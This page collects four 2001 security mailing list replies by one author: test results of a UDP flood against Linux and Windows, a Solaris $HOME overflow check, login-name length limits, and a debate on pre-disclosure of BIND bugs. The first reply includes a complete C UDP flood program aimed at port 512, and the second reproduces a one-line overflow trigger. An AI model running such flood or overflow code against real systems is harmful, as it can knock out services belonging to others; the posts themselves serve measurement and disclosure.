Re: UDP packet handling weird behaviour of various operating systems

2001-07-27 Thread Juergen P. Meier

 http://rootshell.com/archive-j457nxiqi3gq59dv/199803/biffit.c
 
 1. Linux 2.4.7 UP (pristine source, waiting for a new shiny Alan Cox patch)
   - the system freezes after 3 seconds of flood on a gigabit link.
 Same result at 100 Mbps. The top utility shows (at least as long as it can)
 that the system (kernel) gets 100% of the CPU in its march to death. Same for
 Linux kernel 2.2.19.

2.4.6 (modular, unpatched, self-compiled) on an old P133:

biffit against loopback: 99% CPU (system), no slowdown, the system
responds normally.
biffit against eth0: same effect (unsurprising, since Linux routes
packets addressed to the local machine over loopback).

biffit from a PIII/600, connected via full-duplex 100 Mbit: same as above.

In the latter case, my ssh connection to that system (going through the
same NIC that was the target) became a bit sluggish. Console access showed
no impact.

The flood apparently just consumes idle time; interrupt load was not very
high (ping -f is much worse for interrupts).
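
For anyone who wants to reproduce the measurement without digging up the
referenced tool: the core of a biffit-style test is just a tight sendto()
loop towards the biff port. Below is a minimal sketch in C - my own
simplification, not the original biffit.c (which additionally spoofs
source addresses via raw sockets). Aim it only at hosts you administer
yourself and watch top on the receiving side:

/* udpflood.c - minimal sketch of a biffit-style UDP load test.
 * My own simplification, NOT the original biffit.c.
 * Build with: cc -o udpflood udpflood.c */
#include <stdio.h>
#include <string.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>

int main(int argc, char **argv)
{
    if (argc != 2) {
        fprintf(stderr, "usage: %s <target-ip>\n", argv[0]);
        return 1;
    }

    int s = socket(AF_INET, SOCK_DGRAM, 0);
    if (s < 0) {
        perror("socket");
        return 1;
    }

    struct sockaddr_in dst;
    memset(&dst, 0, sizeof dst);
    dst.sin_family = AF_INET;
    dst.sin_port = htons(512);              /* biff/comsat, as biffit uses */
    if (inet_pton(AF_INET, argv[1], &dst.sin_addr) != 1) {
        fprintf(stderr, "bad address: %s\n", argv[1]);
        return 1;
    }

    const char payload[] = "x@y:0";         /* payload content is irrelevant */

    for (;;)                                /* flood until interrupted */
        sendto(s, payload, sizeof payload, 0,
               (struct sockaddr *)&dst, sizeof dst);
}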

Hardware:

Board: ASUS p55tp4n (Intel FX chipset)
CPU: P133 (with F00F bug)
RAM: 64 MB
eth0: RealTek RTL8139 Fast Ethernet at 0xc480b000, 00:00:cb:11:22:33, IRQ 11
eth0:  Identified 8139 chip type 'RTL-8139C'
(nothing else on IRQ11)
Running squid, a web server and 3 ssh connections, with several iptables
rules in place (the UDP packets matched ACCEPT rule #2 in the loopback
case, and rule #4 on the INPUT chain).

no SMP.
 
 I would like to hear some other results for other operating systems.

Windows 98 (running on the PIII/600):
25% CPU load, no side effects.

Juergen 
-- 
Juergen P. Meier



Re: $HOME buffer overflow in SunOS 5.8 x86

2001-06-05 Thread Juergen P. Meier

On Mon, Jun 04, 2001 at 06:14:30PM +0300, Georgi Guninski wrote:
 $HOME buffer overflow in SunOS 5.8 x86
 Systems affected:
 SunOS 5.8 x86 have not tested on other OSes
 Risk: Medium
 Date: 4 June 2001
 
 Details:
 HOME=`perl -e 'print "A"x1100'` ; export HOME
 mail a
 CTL-C
 eip gets smashed with 0x41414141.

0:jpmeier@sol:~ HOME=`perl -e 'print "A"x1100'` ; export HOME
0:jpmeier@sol:/home/jpmeier mail a
^Cmail: Mail saved in dead.letter
1:jpmeier@sol:/home/jpmeier uname -a
SunOS sol 5.8 Generic_108528-04 sun4u sparc SUNW,Ultra-5_10

I also tried larger buffers.

Solaris/SPARC appears not to be vulnerable. Maybe it's an x86-only bug.
 
 Workaround:
 chmod -s /usr/bin/mail
 Vendor status:
 Sun was informed on 29 May 2001 about /usr/bin/mail and shall release patches.
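
For context, the underlying bug class is the familiar one: a setuid binary
copying an attacker-controlled environment variable into a fixed-size stack
buffer without a length check. A minimal sketch of the pattern follows
(my own illustration, not the actual /usr/bin/mail source - whether mail(1)
uses sprintf() or strcpy() there I do not know; the observed 0x41414141 in
eip simply fits this pattern):

/* homecopy.c - sketch of the bug class, not the real /usr/bin/mail code. */
#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    char path[1024];
    const char *home = getenv("HOME");
    if (home == NULL)
        return 1;

    /* Vulnerable pattern:
     *     sprintf(path, "%s/dead.letter", home);
     * An 1100-byte $HOME then overwrites the saved return address. */

    /* Safe pattern: bound the copy and detect truncation. */
    if (snprintf(path, sizeof path, "%s/dead.letter", home)
            >= (int)sizeof path) {
        fprintf(stderr, "HOME too long\n");
        return 1;
    }
    printf("would write %s\n", path);
    return 0;
}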

juergen

-- 
Juergen P. Meier                          email: [EMAIL PROTECTED]



Re: vixie cron possible local root compromise

2001-02-15 Thread Juergen P. Meier

On Wed, Feb 14, 2001 at 11:34:02AM -0500, Valdis Kletnieks wrote:
 Of course, what's important isn't what wtmpx.h defines it as, but what pwd.h
 has to say about it.  If getpwent() won't handle it, your wtmp format doesn't
 matter...

 Note also that some systems have utmpx.h not wtmpx.h

  If anyone can find any system that reports less than 32, it will be an
  exception to the rule. Of course I mean current systems. libc5 systems,
  AIX 3.2 and old systems like that will probably return 16 or even 8.

 AIX 4.3.3 and AIX 5.0 both limit it to 8 in utmpx.h

 Solaris 5.7 has a 32-char limit in wtmp, but has this in 'man useradd':

Years of wrestling a big NIS+ cluster of Sun and Linux systems have taught
me that one should _never_ ever completely trust anything that's merely
written in the manual (pages) - it's always better to check against the
source (or at least the headers) - and to check portability before anything
else ;)

Btw, the file-db routines in the Solaris libraries (in Solaris 2.4 through
2.6; I don't know what 7 and 8 make of it) do handle login names of up to
32 chars just fine. It's just that NIS+ is horribly broken when it comes
to long login names (and passwords, btw ;)).
One also runs into big problems with all the login-type daemons like
ftp, rsh etc.

Just a side note: in /usr/include/limits.h one can find this:

(sol 2.6, 7 and 8)
#define LOGNAME_MAX 8   /* max # of characters in a login name */
/* POSIX.1c conformant */
#define _POSIX_LOGIN_NAME_MAX   9

That's one reason why I used to include limits.h in my programs ;)
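
As a quick cross-check (my own small test program, not something from this
thread), the following prints the compile-time constants from <limits.h>
next to the runtime answer from sysconf(), so you can see what a given box
actually advertises:

/* loginmax.c - print the login-name length limits this system advertises. */
#include <stdio.h>
#include <limits.h>
#include <unistd.h>

int main(void)
{
#ifdef LOGNAME_MAX
    printf("LOGNAME_MAX                 = %d\n", LOGNAME_MAX);
#endif
#ifdef LOGIN_NAME_MAX
    printf("LOGIN_NAME_MAX              = %d\n", LOGIN_NAME_MAX);
#endif
#ifdef _POSIX_LOGIN_NAME_MAX
    printf("_POSIX_LOGIN_NAME_MAX       = %d\n", _POSIX_LOGIN_NAME_MAX);
#endif
#ifdef _SC_LOGIN_NAME_MAX
    /* Runtime value; -1 means the limit is indeterminate here. */
    printf("sysconf(_SC_LOGIN_NAME_MAX) = %ld\n",
           (long)sysconf(_SC_LOGIN_NAME_MAX));
#endif
    return 0;
}

Comparing that output with what NIS+, wtmpx and the login-type daemons
really accept is exactly the kind of check-the-source-not-the-manpage
exercise described above.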


 Moral of the story:  Not all the world is Linux, and some vendors care
 more about backward and cross compatability than being the latest-and-greatest.

ACK

 --
   Valdis Kletnieks
   Operating Systems Analyst
   Virginia Tech


Juergen

--
Juergen P. Meier                          email: [EMAIL PROTECTED]



Re: Defending the (supposedly) indefensible...

2001-02-03 Thread Juergen P. Meier

On Fri, Feb 02, 2001 at 02:14:58PM -0500, Phil Scarr wrote:
 While there has been a lot of hyperbole strewn about on this topic, I
 figured I'd go out on a very long, slender limb and agree with the
 stated purpose of this new conspiracy/cabal/clique/whatever.

Well, not that long - the ISC's arguments are quite valid, even if I
disagree with their plans.

 I agree that TLDs should have early access to security related issues.
 I can also make the same argument for vendors who ship bind as part of
 their offerings, especially OS vendors like Sun, HP and IBM.

Whatever the ISC does, those vital parts of the internet infrastructure
should always get this information immediately, with as little delay
as humanly and technically possible.

 While most people who read this list are quite happy to go to ISC and
 fetch the most recent code at the announcement of a bug, there are
 *literally millions* of people who rely on the vendor to ship them an
 updated version so they can pkgadd/swinstall/rpm it into place.  They
 don't have the interest/skills/whatever necessary to maintain their own
 versions of utilities they get from their vendor.  To them, named is
 *part of the OS*, not something you hack into place by typing
 make/configure/whatever.

sad but true.

 Is it fair to them to delay a timely response from their vendor (who
 are, by the nature of the size and scope of their operations, slower
 than glaciers at releasing fixes) when that vendor could (and should)
 have advance notice of a security flaw for which there are no known
 exploits in the real world?  Sure, we can argue that vendors *should* be
 faster, but that doesn't get the work done.

Ah, here I think you (and the ISC) have overlooked something:
although I believe the probability of having a blackhat among
the root-nameserver maintainers is close to zero, I am convinced
that the probability of blackhats among all the people at the
big vendors (IBM, Sun, HP and the Linux distributors) who would
receive such a closed-recipient-list security bulletin is much
closer to one.

I fear that if the ISC really makes this pre-announcement a
reality, we will have a situation where the bad guys get those
security warnings at the same time as the root-NS and TLD maintainers
and the vendors, and have even more time to develop and _use_ exploits
before the rest of us even know that there is a hole.

Well, it seems that "Obscurity != Security" does apply here too.

The ISC should take this into account and weigh it against
their arguments.

 Flame away!

love to ;)

 ;-)

   -Phil

juergen

--
Juergen P. Meier                          email: [EMAIL PROTECTED]